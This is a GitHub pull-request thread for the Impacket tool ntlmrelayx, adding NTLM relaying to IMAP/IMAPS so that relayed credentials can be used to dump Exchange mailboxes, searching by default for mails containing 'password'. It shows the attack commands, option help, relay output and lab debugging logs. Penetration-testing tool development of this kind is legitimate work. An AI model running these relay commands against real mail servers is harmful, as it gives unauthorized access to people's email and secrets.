### PR TITLE
ntlmrelayx - relaying to IMAP

### PR DESCRIPTION
**Pull request by dirkjanm**
Added relaying to IMAP - think dumping Exchange mailboxes when NTLM auth is enabled :)

```
dirkjan@ubuntu:~/impacket-merge$ sudo ntlmrelayx.py -t imaps://192.168.222.103 -l ~/tmp/
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 192.168.222.65, attacking target 192.168.222.103
[*] Authenticating against 192.168.222.103 as TEST\testuser SUCCEED
...
[*] Found 2 messages in mailbox INBOX
[*] Dumping 1 messages found by search for "password"
[*] Done fetching message 1/1
```

Added options:
```
IMAP client options:
  -k KEYWORD, --keyword KEYWORD
                        IMAP keyword to search for. If not specified, will
                        search for mails containing "password"
  -m MAILBOX, --mailbox MAILBOX
                        Mailbox name to dump. Default: INBOX
  -a, --all             Instead of searching for keywords, dump all emails
  -im IMAP_MAX, --imap-max IMAP_MAX
                        Max number of emails to dump (0 = unlimited, default:
                        no limit)
```

### CODE REVIEW

**Comment by asolino** [comment]
Jussst landed thanks @dirkjanm !

**Comment by asolino** [comment]
Hey @dirkjanm 

I'm trying to test this out but can't come up with a way to enable NTLM in IMAP. Can you give me some hints on what your test lab (and configuration) looks like? I'd love to play with this feature

**Comment by dirkjanm** [comment]
Sure @asolino, I had some problems with it as well, I couldn't get it working on exchange 2013, even after setting the auth for IMAP to "integrated windows authentication (plain)".
It only offered me NTLM authentication after installing the latest updates: https://www.microsoft.com/en-us/download/details.aspx?id=53835
Hope that helps!

**Comment by asolino** [comment]
Thanks for your quick answer @dirkjanm!.. Adding @mubix here since he originally brought this up to me.

cheers!

**Comment by mubix** [comment]
```
python ntlmrelayx.py -t imap://192.168.80.13 -im 500 -a
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] Incoming connection (192.168.80.69,51470)
[*] SMBD: Received connection from 192.168.80.69, attacking target 192.168.80.13
[-] Connection against target 192.168.80.13 FAILED
[-] socket error: EOF
[-] processRequest (0x73,('IMAP', '192.168.80.13', 143, ''))
[*] Handle: ('IMAP', '192.168.80.13', 143, '')
[*] Closing down connection (192.168.80.69,51470)
[*] Remaining connections ['SMBRelay']
```

**Comment by mubix** [comment]
```
python ntlmrelayx.py -t imaps://192.168.80.13 -im 500 -a
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] Incoming connection (192.168.80.69,51730)
[*] SMBD: Received connection from 192.168.80.69, attacking target 192.168.80.13
[-] Connection against target 192.168.80.13 FAILED
[-] [Errno 104] Connection reset by peer
[-] processRequest (0x73,('IMAPS', '192.168.80.13', 993, ''))
[*] Handle: ('IMAPS', '192.168.80.13', 993, '')
[*] Closing down connection (192.168.80.69,51730)
[*] Remaining connections ['SMBRelay']
```

**Comment by mubix** [comment]
```
C:\>netstat -ano | findstr /i listen
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING       4464
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:143            0.0.0.0:0              LISTENING       4860
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:444            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:465            0.0.0.0:0              LISTENING       7020
  TCP    0.0.0.0:475            0.0.0.0:0              LISTENING       5240
  TCP    0.0.0.0:587            0.0.0.0:0              LISTENING       4464
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:717            0.0.0.0:0              LISTENING       4464
  TCP    0.0.0.0:808            0.0.0.0:0              LISTENING       1876
  TCP    0.0.0.0:890            0.0.0.0:0              LISTENING       1704
  TCP    0.0.0.0:993            0.0.0.0:0              LISTENING       4860
```

**Comment by asolino** [comment]
I just tested down here against a live environment and it worked like a charm, port 993 over a SSL channel (I ran it with `-im 50` tho and it downloaded 50 emails). Let me see what can you change to output traceback errors

**Comment by asolino** [comment]
Does `openssl s_client -host 192.168.80.13 -port 993` work?

What are you seeing over the wire when you ran `ntlmrelayx.py`. Please sniff connections to `192.168.80.13`

**Comment by mubix** [comment]
After a reboot I get this:
```
python ntlmrelayx.py -t imaps://192.168.80.13 -im 500 -a
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] Incoming connection (192.168.80.69,49934)
[*] SMBD: Received connection from 192.168.80.69, attacking target 192.168.80.13
[-] Connection against target 192.168.80.13 FAILED
[-] EOF occurred in violation of protocol (_ssl.c:590)
[-] processRequest (0x73,('IMAPS', '192.168.80.13', 993, ''))
[*] Handle: ('IMAPS', '192.168.80.13', 993, '')
[*] Closing down connection (192.168.80.69,49934)
[*] Remaining connections ['SMBRelay']
```

The noticeable difference being the following line:
```
[-] EOF occurred in violation of protocol (_ssl.c:590)
```

**Comment by asolino** [comment]
Yep.. that is an OpenSSL error.. did you try `openssl s_client -host 192.168.80.13 -port 993`?

**Comment by mubix** [comment]
```
CONNECTED(00000003)
write:errno=104
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 0 bytes and written 305 bytes
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : 0000
    Session-ID:
    Session-ID-ctx:
    Master-Key:
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1480622500
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
```

**Comment by asolino** [comment]
I see a problem there.. at the live environment I tested, I first get the server's certificate, and finally I get something like this:
```
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1
    Cipher    : ECDHE-RSA-AES256-SHA
    Session-ID: <blob in here>
    Session-ID-ctx: 
    Master-Key: <blob in here>
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1480622745
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---
* OK The Microsoft Exchange IMAP4 service is ready.

```

**Comment by mubix** [comment]
Ya my Exchange install seems pretty jacked up. Thanks for double checking @asolino

**Comment by dirkjanm** [comment]
You should make sure the IMAP4 and IMAP4 backend services are running. Afterwards its easiest to debug with ncat: `ncat 192.168.80.13 993 --ssl -C -v` and see if you can get any output from there.

**Pull request merged**
